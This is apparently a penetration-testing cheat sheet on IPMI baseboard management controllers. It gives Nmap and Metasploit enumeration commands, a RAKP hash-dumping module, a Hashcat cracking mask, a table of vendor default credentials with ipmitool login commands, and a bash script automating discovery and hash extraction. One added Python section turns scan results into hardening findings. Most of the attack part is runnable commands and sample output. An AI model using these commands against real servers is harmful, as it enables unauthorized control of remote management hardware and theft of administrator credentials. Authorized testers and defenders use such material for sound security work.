IPMI
Table of Contents
- Introduction to IPMI
- Enumeration Techniques
- Advanced Techniques
- Exploitation Scenarios
- Combining Tools
- Glossary
Introduction to IPMI
Overview of IPMI
The Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems. It provides administrators with the ability to manage systems remotely, even if the host is powered off or unresponsive.
Core Features:
- Remote BIOS settings modifications.
- System power management (reboot, shutdown).
- Hardware monitoring (temperature, voltage, fan status).
Key Components
| Component | Description |
|---|---|
| Baseboard Management Controller (BMC) | A microcontroller for managing and monitoring system hardware. |
| Intelligent Chassis Management Bus (ICMB) | Enables communication between chassis systems. |
| IPMI Memory | Stores logs, repository data, and event logs. |
| Communication Interfaces | Includes local system interfaces, serial/LAN interfaces, and PCI Management Bus. |
Default Configuration
- Port: UDP 623.
- Authentication: Defaults to weak credentials or factory-set passwords.
- Common BMC Implementations: HP iLO, Dell DRAC, Supermicro IPMI.
Enumeration Techniques
Nmap Service Discovery
Identify IPMI services and gather version details.
Command:
```bash
nmap -sU --script ipmi-version -p 623 TARGET_IP
```
Example Output:
```
PORT STATE SERVICE
623/udp open asf-rmcp
| ipmi-version:
| Version: IPMI-2.0
| UserAuth: auth_user, non_null_user
|_ PassAuth: password, md5, sha1
```
Metasploit IPMI Scanner
Use Metasploit’s auxiliary modules to enumerate IPMI services.
Command:
```
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS TARGET_IP
run
```
Example Output:
```
[+] TARGET_IP:623 - IPMI - IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, sha1)
```
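As an added example (not code from the original page or from either tool), the following Python parses the Version, UserAuth and PassAuth fields from both the Nmap and Metasploit outputs above and turns them into hardening findings for a BMC inventory review. The sample inputs are constructed, and the keywords none, null_user and anonymous are assumptions about what the tools print for those authentication types.

```python
import re

# Constructed samples (not real scan data): an Nmap ipmi-version block and a
# Metasploit ipmi_version banner, in the formats shown above.
NMAP_SAMPLE = """\
PORT    STATE SERVICE
623/udp open  asf-rmcp
| ipmi-version:
|   Version: IPMI-2.0
|   UserAuth: auth_user, non_null_user
|_  PassAuth: password, md5, sha1
"""
MSF_SAMPLE = ("[+] 192.0.2.5:623 - IPMI - IPMI-2.0 "
              "UserAuth(auth_user, non_null_user) PassAuth(password, md5, sha1)")


def parse_ipmi_version(text):
    """Extract Version, UserAuth and PassAuth from either tool's output."""
    info = {"Version": None, "UserAuth": [], "PassAuth": []}
    for line in text.splitlines():
        m = re.search(r"\b(IPMI-\d\.\d)\b", line)
        if m:
            info["Version"] = m.group(1)
        # "UserAuth: a, b" (Nmap) or "UserAuth(a, b)" (Metasploit banner)
        for key, val in re.findall(r"(UserAuth|PassAuth)[:(]\s*([^)\n]*)", line):
            info[key] = [v.strip() for v in val.split(",") if v.strip()]
    return info


def assess(info):
    """Map advertised capabilities to findings for a BMC hardening review."""
    findings = []
    if info["Version"] == "IPMI-2.0":
        findings.append("IPMI 2.0 (RMCP+): the RAKP exchange returns a salted password hash "
                        "to any client that supplies a valid username, so password strength "
                        "and network isolation of UDP 623 are the controls")
    pass_auth, user_auth = set(info["PassAuth"]), set(info["UserAuth"])
    if "none" in pass_auth:  # assumed keyword for the 'none' authentication type
        findings.append("authentication type 'none' enabled: unauthenticated sessions")
    if "password" in pass_auth:
        findings.append("straight-password type enabled: IPMI 1.5 sessions carry the "
                        "password in cleartext")
    if user_auth & {"null_user", "anonymous"}:  # assumed keywords for null/anonymous login
        findings.append("null or anonymous user login enabled")
    return findings


if __name__ == "__main__":
    for sample in (NMAP_SAMPLE, MSF_SAMPLE):
        for finding in assess(parse_ipmi_version(sample)):
            print("-", finding)
```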
Advanced Techniques
Dumping IPMI Password Hashes
Leverage IPMI's RAKP protocol flaw to retrieve password hashes. In the IPMI 2.0 RAKP exchange, the BMC returns an HMAC keyed with the user's password before the client has authenticated, so anyone who can reach UDP 623 and supply a valid username receives a salted hash that can be cracked offline.
Metasploit Module:
```
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS TARGET_IP
run
```
Example Output:
```
[+] TARGET_IP:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c31
```
Offline Password Cracking
Extracted hashes can be cracked offline using tools like Hashcat.
Hashcat Command:
```bash
hashcat -m 7300 ipmi_hashes.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
```
Explanation:
- -m 7300: Specifies the IPMI 2.0 RAKP HMAC-SHA1 hash type.
- -a 3: Uses brute-force (mask) mode.
- -1 ?d?u: Defines custom charset 1 as digits plus uppercase letters.
- ?1?1?1?1?1?1?1?1: An eight-character mask in which each position is drawn from charset 1, i.e. uppercase letters and digits.
Exploitation Scenarios
Default Password Exploitation
Many BMCs use weak or factory-set default passwords. Test the following common credentials:
| BMC Type | Default Username | Default Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | Randomized (8 chars) |
| Supermicro IPMI | ADMIN | ADMIN |
Command:
```bash
ipmitool -H TARGET_IP -U ADMIN -P ADMIN -I lanplus power status
```
IPMI Configuration Weaknesses
Exploit weak configurations, such as no network segmentation or lack of encryption.
Example:
- Retrieve IPMI system logs:
```bash
ipmitool -H TARGET_IP -U ADMIN -P ADMIN -I lanplus sel list
```
- Use the obtained logs for further enumeration.
Combining Tools
Using Nmap with Metasploit
- Discovery with Nmap:
```bash
nmap -sU --script ipmi-version -p 623 TARGET_IP
```
- Exploit with Metasploit:
```
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS TARGET_IP
run
```
Automating with Scripts
Automate IPMI enumeration and exploitation using bash. The script takes the target as its only argument, quotes it so that it is passed through safely, and exits Metasploit once the module has run.
Example Script:
```bash
#!/bin/bash
set -eu
[ $# -eq 1 ] || { echo "usage: $0 TARGET_IP" >&2; exit 1; }
target="$1"
nmap -sU --script ipmi-version -p 623 "$target"
msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS $target; run; exit"
```
Glossary
| Term | Definition |
|---|---|
| IPMI | Intelligent Platform Management Interface for remote server management. |
| BMC | Baseboard Management Controller, the hardware implementing IPMI. |
| RAKP | Remote Authenticated Key-Exchange Protocol, used in IPMI authentication. |
| LANplus | A secure IPMI communication protocol. |
| SEL | System Event Log, stores hardware and system events. |